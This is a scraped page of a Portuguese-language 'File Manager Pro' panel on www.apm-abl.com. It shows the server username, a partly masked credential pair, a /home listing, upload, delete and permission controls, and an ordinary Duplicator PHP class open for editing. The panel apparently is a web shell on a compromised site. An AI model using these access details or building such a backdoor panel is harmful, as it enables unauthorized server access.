🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_e81b6857 / b63c****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: class.chunkingmanager_file.php
<?php /** * Cunking manager with stored data in json file. * * Standard: PSR-2 * * @link http://www.php-fig.org/psr/psr-2 Full Documentation * * @package SC\DUPX\Chunk */ defined('ABSPATH') || defined('DUPXABSPATH') || exit; use Duplicator\Libs\Snap\SnapJson; require_once(DUPX_INIT . '/classes/chunk/class.chunkingmanager.php'); /** * Store position on json file */ abstract class DUPX_ChunkingManager_file extends DUPX_ChunkingManager { /** * load data from previous step if exists * * @param string $key file name * * @return mixed */ protected function getStoredData($key) { if (file_exists($key)) { $data = file_get_contents($key); return json_decode($data, true); } else { return null; } } /** * delete stored data if exists */ protected function deleteStoredData($key) { if (file_exists($key)) { unlink($key); } } /** * * @param string $key file path * @param mixed $data to save in file path * * @return boolean|int This function returns the number of bytes that were written to the file, or FALSE on failure. */ protected function saveStoredData($key, $data) { if (($json = SnapJson::jsonEncode($data)) === false) { throw new Exception('Json encode chunk data error'); } return file_put_contents($key, $json); } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar